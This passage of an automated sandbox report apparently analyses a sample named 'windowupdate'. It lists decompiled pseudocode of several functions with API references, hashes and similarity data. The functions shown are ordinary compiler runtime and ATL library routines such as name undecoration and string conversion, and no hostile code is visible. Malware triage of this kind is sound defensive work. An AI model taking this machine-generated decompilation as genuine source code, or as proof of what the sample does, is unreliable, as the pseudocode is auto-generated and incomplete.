                      				char* _v92;
                      				char _v96;
                      				intOrPtr _v100;
                      				char _v104;
                      				intOrPtr _v108;
                      				char _v112;
                      				char* _t64;
                      				intOrPtr _t82;
                      				char* _t89;
                      				signed int _t92;
                      
                      				_t64 =  *0xf20640; // 0x0
                      				if( *_t64 == 0) {
                      					E00D4F350(_a4, 1);
                      					return _a4;
                      				}
                      				_t89 =  *0xf20640; // 0x0
                      				_v16 =  *_t89 - 0x41;
                      				_t82 =  *0xf20640; // 0x0
                      				 *0xf20640 = _t82 + 1;
                      				_v8 = _v16;
                      				if(_v8 > 0x16) {
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				E00D4F350( &_v24, 2);
                      				if(E00D52230( &_v24) == 0) {
                      					L16:
                      					E00D4F240(_a4,  &_v24);
                      					return _a4;
                      				}
                      				_v12 = _v8 & 0xfffffffe;
                      				if(_v12 > 0x16) {
                      					goto L16;
                      				}
                      				_t10 = _v12 + 0xd53a00; // 0xcccccc0a
                      				_t92 =  *_t10 & 0x000000ff;
                      				switch( *((intOrPtr*)(_t92 * 4 +  &M00D539D0))) {
                      					case 0:
                      						_v32 = E00D50130(_t87, 1);
                      						_v28 = _t92;
                      						E00D4F7E0( &_v24,  &_v32);
                      						goto L16;
                      					case 1:
                      						_v40 = E00D50130(__ecx, 2);
                      						_v36 = __edx;
                      						__ecx =  &_v40;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v40);
                      						goto L16;
                      					case 2:
                      						_v48 = E00D50130(__ecx, 4);
                      						_v44 = __edx;
                      						__edx =  &_v48;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v48);
                      						goto L16;
                      					case 3:
                      						_v56 = E00D50130(__ecx, 3);
                      						_v52 = __edx;
                      						__eax =  &_v56;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v56);
                      						goto L16;
                      					case 4:
                      						_v64 = E00D50130(__ecx, 5);
                      						_v60 = __edx;
                      						__ecx =  &_v64;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v64);
                      						goto L16;
                      					case 5:
                      						_v80 = E00D50130(__ecx, 7);
                      						_v76 = __edx;
                      						__eax =  &_v80;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v80);
                      						goto L16;
                      					case 6:
                      						_v88 = E00D50130(__ecx, 8);
                      						_v84 = __edx;
                      						__ecx =  &_v88;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v88);
                      						goto L16;
                      					case 7:
                      						_v72 = E00D50130(__ecx, 6);
                      						_v68 = __edx;
                      						__edx =  &_v72;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v72);
                      						goto L16;
                      					case 8:
                      						_v96 = E00D50130(__ecx, 9);
                      						_v92 = __edx;
                      						__edx =  &_v96;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v96);
                      						goto L16;
                      					case 9:
                      						_v104 = E00D50130(__ecx, 0xa);
                      						_v100 = __edx;
                      						__eax =  &_v104;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v104);
                      						goto L16;
                      					case 0xa:
                      						_v112 = E00D50130(__ecx, 0xb);
                      						_v108 = __edx;
                      						__ecx =  &_v112;
                      						__ecx =  &_v24;
                      						__eax = E00D4F7E0(__ecx,  &_v112);
                      						goto L16;
                      					case 0xb:
                      						goto L16;
                      				}
                      			}

                      APIs
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 00D5380E
                      • Mailbox.LIBCMTD ref: 00D539A0
                      • DName::DName.LIBVCRUNTIMED ref: 00D53809
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 00D539B1
                      • DName::DName.LIBVCRUNTIMED ref: 00D539C2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
                      • String ID:
                      • API String ID: 2417761376-0
                      • Opcode ID: 5b70051300babbb170745039f8f3e0857179313e25eba4d8aa9b056db4fe2de5
                      • Instruction ID: 6ffa9a7aadea3d1eaa0433a079c8dca6b907dbcd233299f0d035d0ba0520a631
                      • Opcode Fuzzy Hash: 5b70051300babbb170745039f8f3e0857179313e25eba4d8aa9b056db4fe2de5
                      • Instruction Fuzzy Hash: 935112F6C002099BDF05DFE4D8529ED7BB4EF54341F14412AED0A6A191EA746B08CF72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00D599E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
                      				signed char _v5;
                      				char _v6;
                      				void* _v12;
                      				char* _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v32;
                      				char _v40;
                      				char _v48;
                      				char* _t97;
                      				intOrPtr _t98;
                      
                      				_v24 = __ecx;
                      				E00D4F3F0( &_v32);
                      				E00D5A860(__ebx, __edi, __esi,  &_v40);
                      				if(E00D5AB70( &_v40) != 3) {
                      					if(E00D5AB70( &_v40) == 2) {
                      						L5:
                      						_v5 = 0;
                      						_push(_v5 & 0x000000ff);
                      						_t98 =  *0xf20644; // 0x0
                      						E00D4F820( &_v32, E00D4E5F0( &_v48, _t98));
                      						L7:
                      						if(_a4 == 0) {
                      							_a8 = E00D5A700( &_v32) + 1;
                      							_v20 = E00D4F7A0(_a8, 0xf2065c, 1);
                      							_a4 = _v20;
                      						}
                      						if(_a4 == 0) {
                      							L20:
                      							return _a4;
                      						} else {
                      							E00D57D80( &_v32, _a4, _a8);
                      							_v12 = _a4;
                      							_v16 = _v12;
                      							while( *_v12 != 0) {
                      								if( *_v12 != 0x20) {
                      									_v6 =  *_v12;
                      									_v12 = _v12 + 1;
                      									 *_v16 = _v6;
                      									_v16 = _v16 + 1;
                      									L18:
                      									continue;
                      								}
                      								_v12 = _v12 + 1;
                      								 *_v16 = 0x20;
                      								_v16 = _v16 + 1;
                      								while( *_v12 == 0x20) {
                      									_v12 = _v12 + 1;
                      								}
                      								goto L18;
                      							}
                      							 *_v16 =  *_v12;
                      							goto L20;
                      						}
                      					}
                      					if(E00D52290() != 0) {
                      						L6:
                      						E00D4F820( &_v32,  &_v40);
                      						goto L7;
                      					}
                      					_t97 =  *0xf20640; // 0x0
                      					if( *_t97 == 0) {
                      						goto L6;
                      					}
                      					goto L5;
                      				}
                      				return 0;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D599EC
                        • Part of subcall function 00D5A860: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5A869
                        • Part of subcall function 00D5A860: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5A8C6
                        • Part of subcall function 00D5A860: operator+.LIBVCRUNTIMED ref: 00D5A8D7
                        • Part of subcall function 00D5A860: Mailbox.LIBCMTD ref: 00D5A8E3
                        • Part of subcall function 00D5A860: Mailbox.LIBCMTD ref: 00D5A9D5
                      • Mailbox.LIBCMTD ref: 00D59A53
                      • DName::length.LIBVCRUNTIMED ref: 00D59A6F
                      • DName::getString.LIBCMTD ref: 00D59AAB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
                      • String ID:
                      • API String ID: 245642696-0
                      • Opcode ID: f0eae23b3c0c17c98c275caf576d87408967e2a47a8aacb81850e9bde8f59df6
                      • Instruction ID: 9e122e66827f0546e9806a88290d00476fd32b114c147703c9ebf3ca5c55aa3c
                      • Opcode Fuzzy Hash: f0eae23b3c0c17c98c275caf576d87408967e2a47a8aacb81850e9bde8f59df6
                      • Instruction Fuzzy Hash: 7E416B75D04248EFCF08DFA4D4A19EEBBB1EF55302F288199EC55A7341DA30AA49CB70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E00D31AC0(void* __ecx, void* __esi, short* _a4, char* _a8, int _a12, int _a16) {
                      				intOrPtr _v8;
                      				short* _t14;
                      				int _t18;
                      				void* _t20;
                      				void* _t21;
                      				void* _t22;
                      				void* _t32;
                      				void* _t33;
                      
                      				_v8 = 0xcccccccc;
                      				_t35 = _a8;
                      				if(_a8 == 0) {
                      					_t22 = L00D84930(_t35, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x234, 0, "%ls", L"lpa != 0");
                      					_t33 = _t33 + 0x18;
                      					if(_t22 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t37 = _a4;
                      				if(_a4 == 0) {
                      					_t21 = L00D84930(_t37, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x235, 0, "%ls", L"lpw != 0");
                      					_t33 = _t33 + 0x18;
                      					if(_t21 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 == 0 || _a8 == 0) {
                      					_t14 = 0;
                      				} else {
                      					 *_a4 = 0;
                      					_t18 = MultiByteToWideChar(_a16, 0, _a8, 0xffffffff, _a4, _a12);
                      					__eflags = _t33 - _t33;
                      					_v8 = E00DC1520(_t18, _t33 - _t33);
                      					__eflags = _v8;
                      					if(__eflags != 0) {
                      						_t14 = _a4;
                      					} else {
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t20 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x23f, 0, "%ls", 0xde40dc);
                      							_t33 = _t33 + 0x18;
                      							__eflags = _t20 - 1;
                      							if(__eflags == 0) {
                      								asm("int3");
                      							}
                      						}
                      						_t14 = 0;
                      					}
                      				}
                      				return E00DC1520(_t14, _t32 - _t33 + 4);
                      			}

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 00D31B52
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: 690275efcf1a47fdb9b6e8a8fe0873f3c0fe2b872fdf085af57e0bf241359d85
                      • Instruction ID: 4bcef6ac00e0e796113e81e5f7d3e4b7c06d96043cdb81c62397694ad65ef0cb
                      • Opcode Fuzzy Hash: 690275efcf1a47fdb9b6e8a8fe0873f3c0fe2b872fdf085af57e0bf241359d85
                      • Instruction Fuzzy Hash: AE213534E8031ABFDF20FE55EC07FAA73549B25B51F148018FA146A1C1F2B0DA948BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D552B0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v32;
                      				char _v40;
                      				char _v48;
                      				char _v56;
                      				void* _t34;
                      				void* _t46;
                      				void* _t47;
                      
                      				_t47 = __esi;
                      				_t46 = __edi;
                      				_t34 = __ebx;
                      				_v8 = E00D4F7A0(8, 0xf2065c, 0);
                      				_t52 = _v8;
                      				if(_v8 == 0) {
                      					_v12 = 0;
                      				} else {
                      					_v12 = E00D4F3F0(_v8);
                      				}
                      				_v16 = _v12;
                      				E00D54380(_t34, _t46, _t47, _t52,  &_v32, _v16);
                      				_v20 = E00D57D00( &_v40);
                      				_v24 = E00D4FBB0(_v20,  &_v48, 0x20);
                      				E00D4F820(_v16, E00D4FB70(_v24,  &_v56, _a8));
                      				E00D4F240(_a4,  &_v32);
                      				return _a4;
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
                      • String ID:
                      • API String ID: 2657989147-0
                      • Opcode ID: 833c0e0302178e8135cc2a00c3099550d0fe053c43350d6bcebdba4535a6041c
                      • Instruction ID: 801f7c8bd09281c9eb256a383d522db534658be02a3bcea2f67e24ce49e56b02
                      • Opcode Fuzzy Hash: 833c0e0302178e8135cc2a00c3099550d0fe053c43350d6bcebdba4535a6041c
                      • Instruction Fuzzy Hash: E211F1B5D00108ABDF04EFE4D852AEEB7B9EF44301F108169E915A7291EB706A44CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D527C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				char _v20;
                      				char* _t13;
                      				intOrPtr _t22;
                      				char* _t33;
                      
                      				_t13 =  *0xf20640; // 0x0
                      				if( *_t13 != 0) {
                      					E00D586C0(__ebx, __edi, __esi,  &_v12);
                      					E00D4FDE0( &_v12, 0x5b);
                      					E00D4FD40( &_v12, E00D586C0(__ebx, __edi, __esi,  &_v20));
                      					E00D4FDE0( &_v12, 0x5d);
                      					_t33 =  *0xf20640; // 0x0
                      					if( *_t33 != 0x40) {
                      						E00D4F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t22 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t22 + 1;
                      					E00D4F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}
                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D527D7
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+=.LIBCMTD ref: 00D527F2
                      • DName::operator+=.LIBCMTD ref: 00D52811
                      • Mailbox.LIBCMTD ref: 00D52838
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Node::makeStatus
                      • String ID:
                      • API String ID: 3118159130-0
                      • Opcode ID: ed115ff644bdfcbf79e436a8b71564331ab82575bbe57e84408217f91dc1dd53
                      • Instruction ID: 7dda82379a16756777a70b8092f8680b616353a4a66d5c07307499094377452c
                      • Opcode Fuzzy Hash: ed115ff644bdfcbf79e436a8b71564331ab82575bbe57e84408217f91dc1dd53
                      • Instruction Fuzzy Hash: E6118071A00108ABDB14EFA0DC929BE3B74EB51345F044068FC4A5B1A2DF31BA49CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00D8C690(signed int __ecx, void* __edi) {
                      				char _v5;
                      				signed int _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr* _v24;
                      				signed int _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr* _v40;
                      				signed int _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				char _v56;
                      				intOrPtr _v60;
                      				char _v64;
                      				intOrPtr _v68;
                      				signed int _t83;
                      				intOrPtr _t90;
                      				signed int _t102;
                      				char _t105;
                      				void* _t112;
                      				void* _t116;
                      				void* _t169;
                      				void* _t170;
                      				void* _t173;
                      
                      				_t169 = __edi;
                      				_v12 = __ecx;
                      				_t83 = _v12;
                      				if( *((intOrPtr*)( *_t83)) != 0) {
                      					_v32 = E00D8C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)))));
                      					_v24 = E00D8C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)));
                      					_t90 = E00D8C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)));
                      					_t173 = _t170 + 0xc;
                      					_v36 = _t90;
                      					if(_v24 != _v36) {
                      						L18:
                      						 *_v24 = E00D8C4C0( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                      						_v24 = _v24 + 4;
                      						 *((intOrPtr*)( *((intOrPtr*)( *_v12)))) = E00D8C520(_v32);
                      						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)) = E00D8C520(_v24);
                      						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)) = E00D8C520(_v36);
                      						return 0;
                      					}
                      					_v28 = _v36 - _v32 >> 2;
                      					if(_v28 <= 0x200) {
                      						_v44 = _v28;
                      					} else {
                      						_v44 = 0x200;
                      					}
                      					_v48 = _v44;
                      					_t102 = _v28 + _v48;
                      					_v16 = _t102;
                      					if(_t102 == 0) {
                      						_v16 = 0x20;
                      					}
                      					_v20 = 0;
                      					_t135 = _v16;
                      					if(_v16 >= _v28) {
                      						_t116 = E00D897D0(_t135, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x70);
                      						_t173 = _t173 + 0x18;
                      						_v52 = E00D8C620( &_v56, _t116);
                      						_v20 = E00D8CAD0(_v52);
                      						_t102 = E00D8C640( &_v56);
                      					}
                      					if(_v20 == 0) {
                      						_v16 = _v28 + 4;
                      						_t112 = E00D897D0(_v28 + 4, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x77);
                      						_t173 = _t173 + 0x18;
                      						_v60 = E00D8C620( &_v64, _t112);
                      						_v20 = E00D8CAD0(_v60);
                      						_t102 = E00D8C640( &_v64);
                      					}
                      					if(_v20 != 0) {
                      						_v32 = _v20;
                      						_v24 = _v20 + _v28 * 4;
                      						_v36 = _v20 + _v16 * 4;
                      						_push(0);
                      						_t105 = E00D89900(_v20 + _v16 * 4);
                      						_t173 = _t173 + 4;
                      						_v5 = _t105;
                      						_v68 = E00D8C260( &_v5);
                      						_v40 = _v24;
                      						while(_v40 != _v36) {
                      							 *_v40 = _v68;
                      							_v40 = _v40 + 4;
                      						}
                      						goto L18;
                      					} else {
                      						return _t102 | 0xffffffff;
                      					}
                      				}
                      				return _t83 | 0xffffffff;
                      			}
                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D8C764
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D8C7AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: $minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
                      • API String ID: 4219598475-1215429239
                      • Opcode ID: d2feb2ec9feaa2e47a3cc6b3efeb6dc33651ec966f4941dc0939fd7813aa7109
                      • Instruction ID: c2d17d166751c5f2b4536564b28c1d16954e242f4271744592e358862205d0db
                      • Opcode Fuzzy Hash: d2feb2ec9feaa2e47a3cc6b3efeb6dc33651ec966f4941dc0939fd7813aa7109
                      • Instruction Fuzzy Hash: 5671D6B4E10209DFDB04EFA4D891AAEBBB1FF48304F249169E515AB351E731A941CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E00D3F760(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				signed int _v32;
                      				signed int _v36;
                      				void* _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				intOrPtr* _v56;
                      				void* __ebp;
                      				signed int _t62;
                      				void* _t67;
                      				void* _t74;
                      				signed char _t80;
                      				void* _t86;
                      				void* _t90;
                      				void* _t92;
                      				intOrPtr _t98;
                      				intOrPtr _t107;
                      				intOrPtr* _t117;
                      				intOrPtr* _t120;
                      				intOrPtr _t123;
                      				intOrPtr _t125;
                      				signed int _t134;
                      				void* _t135;
                      				void* _t136;
                      
                      				_t129 = __esi;
                      				_t127 = __edi;
                      				_t117 = __edx;
                      				_t93 = __ebx;
                      				_push(0xfffffffe);
                      				_push(0xdf3390);
                      				_push(E00D49CD0);
                      				_push( *[fs:0x0]);
                      				_t136 = _t135 + 0xffffffdc;
                      				_push(__ebx);
                      				_push(__esi);
                      				_push(__edi);
                      				_v56 = 0xcccccccc;
                      				_v52 = 0xcccccccc;
                      				_v48 = 0xcccccccc;
                      				_v44 = 0xcccccccc;
                      				_v40 = 0xcccccccc;
                      				_v36 = 0xcccccccc;
                      				_v32 = 0xcccccccc;
                      				_t62 =  *0xdf600c; // 0x71e60372
                      				_v12 = _v12 ^ _t62;
                      				_push(_t62 ^ _t134);
                      				 *[fs:0x0] =  &_v20;
                      				_v32 = 0x80004003;
                      				if(_a16 == 0) {
                      					L19:
                      					_push(_t117);
                      					_push(_v32);
                      					E00DC14C0(_t134, 0xd3f968);
                      					_pop(_t67);
                      					 *[fs:0x0] = _v20;
                      					return E00DC1520(_t67, _t134 - _t136 + 0x34);
                      				} else {
                      					 *_a16 = 0;
                      					_t139 = _a8;
                      					if(_a8 != 0) {
                      						_t92 = L00D84930(_t139, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xf6b, 0, "%ls", L"pUnkOuter == 0");
                      						_t136 = _t136 + 0x18;
                      						if(_t92 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_a8 == 0) {
                      						_t120 = _a4;
                      						__eflags =  *(_t120 + 0x28);
                      						if( *(_t120 + 0x28) != 0) {
                      							L16:
                      							_t98 = _a4;
                      							__eflags =  *(_t98 + 0x28);
                      							if( *(_t98 + 0x28) != 0) {
                      								_t117 = _a4;
                      								_v32 =  *((intOrPtr*)(_t117 + 0x28));
                      							} else {
                      								_v56 = E00D3EE90(_a4 + 0x2c);
                      								_t117 = _v56;
                      								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t117))))(_v56, _a12, _a16);
                      								__eflags = _t136 - _t136;
                      								_v32 = E00DC1520(_t74, _t136 - _t136);
                      							}
                      							goto L19;
                      						}
                      						__eflags = E00D3EE60(_a4 + 0x2c, 0) & 0x000000ff;
                      						if(__eflags != 0) {
                      							_v8 = 0;
                      							E00D3E840(_a4 + 4, _t129, __eflags);
                      							_t107 = _a4;
                      							__eflags =  *(_t107 + 0x28);
                      							if( *(_t107 + 0x28) == 0) {
                      								_t109 = _a4 + 0x2c;
                      								_t80 = E00D3EE60(_a4 + 0x2c, 0);
                      								__eflags = _t80 & 0x000000ff;
                      								if((_t80 & 0x000000ff) != 0) {
                      									 *((intOrPtr*)(_a4 + 0x28)) = E00D42BD0(_t93, _t109, _t127, _t129,  &_v40);
                      									_t123 = _a4;
                      									__eflags =  *(_t123 + 0x28);
                      									if( *(_t123 + 0x28) >= 0) {
                      										_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_v40))))(_v40, 0xdf02d4, E00D3EEE0(_a4 + 0x2c));
                      										__eflags = _t136 - _t136;
                      										 *((intOrPtr*)(_a4 + 0x28)) = E00DC1520(_t86, _t136 - _t136);
                      										_t125 = _a4;
                      										__eflags =  *(_t125 + 0x28);
                      										if( *(_t125 + 0x28) < 0) {
                      											_v48 = _v40;
                      											__eflags = _v48;
                      											if(_v48 == 0) {
                      												_v52 = 0;
                      											} else {
                      												_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x14))))(1);
                      												__eflags = _t136 - _t136;
                      												_v52 = E00DC1520(_t90, _t136 - _t136);
                      											}
                      										}
                      									}
                      								}
                      							}
                      							_v8 = 0xfffffffe;
                      							E00D3F8E6();
                      						}
                      						goto L16;
                      					} else {
                      						_v32 = 0x80040110;
                      						goto L19;
                      					}
                      				}
                      			}
                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3F942
